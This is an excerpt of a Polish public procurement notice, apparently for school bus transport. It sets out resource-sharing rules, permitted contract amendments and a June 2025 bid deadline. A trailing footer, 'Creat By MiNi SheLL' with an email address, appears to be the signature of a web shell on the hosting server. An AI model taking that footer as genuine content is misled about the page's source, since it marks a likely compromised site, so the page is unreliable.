zamawiający oceni, czy udostępniane wykonawcy przez podmioty udostępniające zasoby zdolności techniczne lub zawodowe, pozwalają na wykazanie przez wykonawcę spełniania warunku/warunków udziału w postępowaniu oraz zbada, czy nie zachodzą wobec tego podmiotu podstawy wykluczenia, które zostały przewidziane względem wykonawcy w części 6 SWZ;<br/>3)	w odniesieniu do warunków dotyczących wykształcenia, kwalifikacji zawodowych lub doświadczenia wykonawcy mogą polegać na zdolnościach podmiotów udostępniających zasoby, jeśli podmioty te wykonają roboty budowlane lub usługi, do realizacji których te zdolności są wymagane.<br/>5.	Zobowiązanie podmiotu udostępniającego zasoby, o którym mowa w ust. 4 pkt 1 potwierdza, że stosunek łączy wykonawcę z podmiotami udostępniającymi zasoby gwarantuje rzeczywisty dostęp do tych zasobów oraz określa w szczególności:<br/>1)	zakres dostępnych wykonawcy zasobów podmiotu udostępniającego zasoby;<br/>2)	sposób i okres udostępnienia wykonawcy i wykorzystania przez niego zasobów podmiotu udostępniającego te zasoby przy wykonywaniu zamówienia;<br/>3)	czy i w jakim zakresie podmiot udostępniający zasoby, na zdolnościach którego wykonawca polega w odniesieniu do warunków udziału w postępowaniu dotyczących wykształcenia, kwalifikacji zawodowych lub doświadczenia, zrealizuje roboty budowlane lub usługi, których wskazane zdolności dotyczą.<br/>6.	Jeżeli zdolności techniczne lub zawodowe, podmiotu udostępniającego zasoby nie potwierdzają spełniania przez wykonawcę warunku/warunków udziału w postępowaniu lub zachodzą wobec tego podmiotu podstawy wykluczenia, zamawiający żąda, aby wykonawca w terminie określonym przez zamawiającego zastąpił ten podmiot innym podmiotem lub podmiotami albo wykazał, że samodzielnie spełnia warunek/warunki udziału w postępowaniu.<br/>Wykonawca nie może, po upływie terminu składania ofert, powoływać się na zdolności podmiotów udostępniających zasoby, jeżeli na etapie składania ofert nie polegał on w danym zakresie na zdolnościach podmiotów udostępniających zasoby. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1. Zamawiający przewiduje możliwość zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy w przypadku wystąpienia okoliczności wymienionych w art. 455 ustawy Pzp.<br/>2. Na podstawie art. 455 ust. 1 pkt 1ustawy Pzp Zamawiający przewiduje możliwość zmian<br/>postanowień zawartej umowy w stosunku do treści oferty Wykonawcy, w następującym zakresie:<br/>1) Zmiany wynagrodzenia Wykonawcy w przypadku:<br/>a) zmiany stawki podatku od towarów i usług,<br/>2) zmiany zakresu lub sposobu wykonywania któregokolwiek świadczenia Wykonawcy<br/>objętego przedmiotem umowy w razie zmiany przepisów prawa powszechnie<br/>obowiązującego lub prawa miejscowego w zakresie niezbędnym do dostosowania umowy<br/>do warunków świadczenia usług wynikających ze zmienionych przepisów prawa;<br/>3) zmiany w zakresie Podwykonawcy, po spełnieniu warunków określonych w § 10 umowy<br/>w przypadku, gdy Wykonawca powierzy Podwykonawcy do wykonania część zamówienia,<br/>którą zgodnie z ofertą miał wykonać osobiście lub gdy Wykonawca wykona osobiście część<br/>zamówienia, którą zgodnie z ofertą miał powierzyć do wykonania Podwykonawcy lub gdy<br/>następuje zmiana Podwykonawcy, na którego zdolnościach polegał Wykonawca ubiegając<br/>się o zawarcie umowy.<br/>4) zmiany terminu wykonania przedmiotu umowy, w przypadku:<br/>a) wystąpienia okoliczności spowodowanych siłą wyższą, w tym wystąpienia zdarzenia<br/>losowego wywołanego przez czynniki zewnętrzne, którego nie można było przewidzieć,<br/>w tym zagrażającego bezpośrednio życiu lub zdrowiu ludzi lub grożącego powstaniem<br/>szkody w znacznych rozmiarach np. pożar, zalanie, zamieszki, klęska żywiołowa, stan<br/>nadzwyczajny, stan zagrożenia epidemicznego, stan epidemii, o ile wyżej wymienione<br/>okoliczności mają charakter obiektywny,<br/>b) gdy wystąpi brak możliwości wykonywania usługi z powodu niedopuszczenia do ich<br/>wykonywania lub ich wstrzymania przez uprawniony organ, z przyczyn niezależnych<br/>od Wykonawcy,<br/>c) zmiany po upływie terminu składania ofert powszechnie obowiązujących przepisów<br/>prawa, które miały wpływ na możliwość wykonania umowy w terminie w niej ustalonym,<br/>d) konieczności zachowania ciągłości usługi do czasu wyłonienia kolejnego wykonawcy<br/>usługi będącej przedmiotem umowy;<br/>3. Zmiana postanowień zawartej umowy może nastąpić wyłącznie za zgodą obu Stron wyrażoną w drodze aneksu do umowy pod rygorem nieważności.<br/>4. Zmianie podlegają także wszystkie nieistotne postanowienia w stosunku do treści oferty, a także inne nieistotne zmiany, które nie stanowią zmiany umowy i nie jest wymagane zawarcie aneksu do umowy, a jedynie niezwłoczne pisemne zawiadomienie drugiej Strony, w tym między innymi:<br/>1) zmiana danych teleadresowych Stron;<br/>2) zmiana danych związanych z obsługą administracyjno-organizacyjną umowy;<br/>3) zmiana Podwykonawcy określonego w ofercie Wykonawcy, po spełnieniu warunków<br/>określonych w § 10 umowy;<br/>4) zmianą osób skierowanych przez Wykonawcę do realizacji przedmiotu umowy.<br/>5) zmiana rozkłady jazdy autobusów.<br/>5. W sytuacji gdy łączna liczba zakupionych biletów na dany miesiąc będzie wynosiła 50% lub mniej w stosunku do szacunkowej łącznej liczby dowożonych uczniów, o której mowa w § 6 ust. 10 umowy, wykonawcy przysługuje prawo do dostosowania ilości autobusów i osób skierowanych do realizacji zamówienia do liczby przewożonych osób przy zachowaniu postanowień umowy wynikających z § 6 ust. 10 z zastrzeżeniem ust. 6 i 7;<br/>6. Wszystkie powyższe postanowienia stanowią katalog zmian, na które Zamawiający może<br/>wyrazić zgodę, nie stanowią jednocześnie zobowiązania do wyrażenia takiej zgody.<br/>7. Zamawiający może nie wyrazić zgody na dokonanie zmian postanowień Umowy, jeśli<br/>proponowana zmiana może wpłynąć na opóźnienie, obniżenie jakości wykonywanych prac<br/>lub zwiększenie kosztów wykonania Umowy. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2025-06-11 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Wykonawca składa ofertę za pośrednictwem zakładki „Oferty/wnioski”, widocznej w podglądzie postępowania po zalogowaniu się na konto Wykonawcy na Platformie e-Zamówienia. https://ezamowienia.gov.pl</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2025-06-11 10:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com